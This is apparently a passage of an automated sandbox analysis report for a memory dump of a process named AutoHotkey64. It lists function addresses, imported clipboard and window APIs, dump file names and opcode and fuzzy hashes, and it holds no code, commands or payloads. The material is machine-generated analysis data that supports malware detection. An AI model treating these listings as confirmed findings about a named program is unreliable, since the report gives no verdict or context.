Opcode ID: c44168a0c375128a96c76f37ba4065139aaddc9c359a229c152312dac270bac8
Instruction ID: 2cb61eae6ee085dbadfb136e8ddd0117e915ef017741733dcd91c3ef6c2a6e2e
Opcode Fuzzy Hash: c44168a0c375128a96c76f37ba4065139aaddc9c359a229c152312dac270bac8
Instruction Fuzzy Hash: 6BA160B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490CB45

Function 0000000140043176 Relevance: 9.2, APIs: 6, Instructions: 196windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e3f4e63cdbcd714937f13fa80d090d0cde0918867ca6b2af1c48e4167f2e9bdb
Instruction ID: dcacb9d378426722920e6bb0cc42339e3c361c8f84d58222d2eed439cc5eb6b1
Opcode Fuzzy Hash: e3f4e63cdbcd714937f13fa80d090d0cde0918867ca6b2af1c48e4167f2e9bdb
Instruction Fuzzy Hash: 85A1C1B160468486FB628B27E4443E937E1F78DBE4F110226EB59A3BF6DB38C490C705

Function 0000000140045096 Relevance: 9.2, APIs: 6, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 65d74aeaa16cd5f36190b97ebebddbd722f9aee99372ae90aabdc9e1754c7043
Instruction ID: 2f12b2770650ee8e69e5cd1c02e2e38d2b186162fcb287a20a36125e7b411be1
Opcode Fuzzy Hash: 65d74aeaa16cd5f36190b97ebebddbd722f9aee99372ae90aabdc9e1754c7043
Instruction Fuzzy Hash: 37A1C5B160464486FB668B27E4443E937E1F38DBE4F110226FB5963AF6DB38C491C745

Function 000000014004519E Relevance: 9.2, APIs: 6, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Part of subcall function 000000014008DED0: RemoveDirectoryW.KERNEL32 ref: 000000014008DEDB

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseDirectoryGlobalMessagePeekRemoveUnlock
String ID:
API String ID: 1863380684-0
Opcode ID: 5b5b8bebe46c09e75493ec95e73ae3aa093305fc8adc33da96ec4d12c4076caa
Instruction ID: 9f3d426bc3b7e78b8381ba750b468b08832b3e45fd2306d6d11be15f72f34720
Opcode Fuzzy Hash: 5b5b8bebe46c09e75493ec95e73ae3aa093305fc8adc33da96ec4d12c4076caa
Instruction Fuzzy Hash: C8A1D3B160464486F7668B27D4843E937A1F38DBE4F110226FB59637F6DB38C884C745

Function 0000000140044B8A Relevance: 9.2, APIs: 6, Instructions: 194windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 75be5e0e610f4e23b3553f3059b2d739fbe7638d79a1f05a475c0afa1fa9bb03
Instruction ID: 2bd10de99036704c8555684fa24da9ccd15d6f7553518d8874b0bf38c850bc38
Opcode Fuzzy Hash: 75be5e0e610f4e23b3553f3059b2d739fbe7638d79a1f05a475c0afa1fa9bb03
Instruction Fuzzy Hash: A8A1C3B1600A4486FB568B27D4443E937A1F74DBE4F11022AFB5963AF6DB38C490C745

Function 00000001400442B9 Relevance: 9.2, APIs: 6, Instructions: 193windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140057F60: GetWindowRect.USER32 ref: 0000000140058051
Part of subcall function 0000000140057F60: GetWindowRect.USER32 ref: 0000000140058086
Part of subcall function 0000000140057F60: GetParent.USER32 ref: 00000001400580B5
Part of subcall function 0000000140057F60: ScreenToClient.USER32 ref: 00000001400580CB

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$RectWindow$ClientClipboardCloseGlobalMessageParentPeekScreenUnlock
String ID:
API String ID: 1625120959-0
Opcode ID: a2c1348c3340522a7efd5b9dc312f22418899a6f369b20b0b26ef88e42d1ec29
Instruction ID: 3553f4b2c4540e32eaeff9207cdb3834cbbf827bf7c34e725a07659000f4c7fb
Opcode Fuzzy Hash: a2c1348c3340522a7efd5b9dc312f22418899a6f369b20b0b26ef88e42d1ec29
Instruction Fuzzy Hash: BBA170B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490CB45

Function 0000000140045428 Relevance: 9.2, APIs: 6, Instructions: 193windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014008D160: CoInitialize.OLE32 ref: 000000014008D18D
Part of subcall function 000000014008D160: CoCreateInstance.OLE32 ref: 000000014008D1B1
Part of subcall function 000000014008D160: GetKeyboardLayout.USER32 ref: 000000014008D2A1

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceKeyboardLayoutMessagePeekUnlock
String ID:
API String ID: 1422310799-0
Opcode ID: 4f5e1761335e9e7a19971aa97c8eb8a09ae0e1cd63c858dc484e13170d325806
Instruction ID: d4b2d97816ed86bacf30cabc9895e8c9a96bf72506c194d9b1d1db82400aef43
Opcode Fuzzy Hash: 4f5e1761335e9e7a19971aa97c8eb8a09ae0e1cd63c858dc484e13170d325806
Instruction Fuzzy Hash: 42A160B1604B4486FB668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490CB45

Function 00000001400434BA Relevance: 9.2, APIs: 6, Instructions: 192windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 3520e795d1f0b5e0b8c31817ea6c196a169760ccbf33bdff67f57cfa4fb230b3
Instruction ID: 2096aba2966e16396bdbcebd4fde1a01974ed4b4b3f4e3af37ee63801081c839
Opcode Fuzzy Hash: 3520e795d1f0b5e0b8c31817ea6c196a169760ccbf33bdff67f57cfa4fb230b3
Instruction Fuzzy Hash: 4DA1C1B160464486FB668B27E4443E937A1F38DBE4F11022AFB5967BF6DB38C891C705

Function 00000001400441BD Relevance: 9.2, APIs: 6, Instructions: 191windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: b609a21a1837adc476ef943efc28297f34dcb1218def0557e841cbb368f3e8f3
Instruction ID: 1c7ecec9171d897db0ed499c261288889f02caa5b94fe6eac3a312b5a452fc85
Opcode Fuzzy Hash: b609a21a1837adc476ef943efc28297f34dcb1218def0557e841cbb368f3e8f3
Instruction Fuzzy Hash: D3A181B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB59A3BF5DB38C490C745

Function 00000001400418FF Relevance: 9.2, APIs: 6, Instructions: 191windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7ca7ac8ea09ddda168b6dd0cfd38a2faca247c1d83b6b480d76cf650552a9f36
Instruction ID: dbfe02e03a6b5884b06af3d5eeb0efd22bd7b7f20f041b2d546664f3dbd33e42
Opcode Fuzzy Hash: 7ca7ac8ea09ddda168b6dd0cfd38a2faca247c1d83b6b480d76cf650552a9f36
Instruction Fuzzy Hash: C091D472604A8485F7628B27E4443E937E1F74DBE4F110226EB5963AF5DB38C895C705

Function 00000001400440A9 Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140056F70: GetWindowRect.USER32 ref: 0000000140056FAF
Part of subcall function 0000000140056F70: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400440FD), ref: 0000000140057093

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
String ID:
API String ID: 1284534901-0
Opcode ID: 6d90be5780437ea1926624bb7a6d1765c7add771d477290e2de1b02934dec151
Instruction ID: 0e6dd191d9ae4923e03cb1b1186f0eae2ca044f727bbeee3e219246d1eb0e5a1
Opcode Fuzzy Hash: 6d90be5780437ea1926624bb7a6d1765c7add771d477290e2de1b02934dec151
Instruction Fuzzy Hash: 61A170B1604B4486F7668B27E8843D937A1F78DBE4F11022AEB5963BF5DB38C490C745

Function 00000001400458BC Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 85df0732ea045a40370ccbb9e49e030338b38a4b809aebcbbab56ef95b61bb3a
Instruction ID: a2a99bfc7a96d3a1b4bb2e50a0af044a57a31f04a6ef9af2919890bcc8f4eef5
Opcode Fuzzy Hash: 85df0732ea045a40370ccbb9e49e030338b38a4b809aebcbbab56ef95b61bb3a
Instruction Fuzzy Hash: A191C5B160064486F7668B27D4943E937A1F74DBE4F12022AFB59636F2DB38C891C705

Function 0000000140044445 Relevance: 9.2, APIs: 6, Instructions: 189windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: da31f3bdcadadb5a6fdcef1082d42f52ec6c7428d76729d312e6bb0e780c1136
Instruction ID: b7c7ee13ca5f46da80dc0b51ca6ee37518d3cb6c7f1671f895b92e2e6846b628
Opcode Fuzzy Hash: da31f3bdcadadb5a6fdcef1082d42f52ec6c7428d76729d312e6bb0e780c1136
Instruction Fuzzy Hash: 4DA181B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490C745

Function 0000000140044497 Relevance: 9.2, APIs: 6, Instructions: 189windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 6f1608d5c6aedc6d76e64c6edf08808660e45f92a9e699860ca068c81e6a5b82
Instruction ID: 0aa26ce7f1bae9317390010e20670f62bc88be08d5281e4763c56a184a7e8ee4
Opcode Fuzzy Hash: 6f1608d5c6aedc6d76e64c6edf08808660e45f92a9e699860ca068c81e6a5b82
Instruction Fuzzy Hash: 1FA170B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490C745

Function 000000014004451B Relevance: 9.2, APIs: 6, Instructions: 189windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005A9B0: wcsncpy.LIBCMT ref: 000000014005AA10
Part of subcall function 000000014005A9B0: _wcstoi64.LIBCMT ref: 000000014005AA53

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
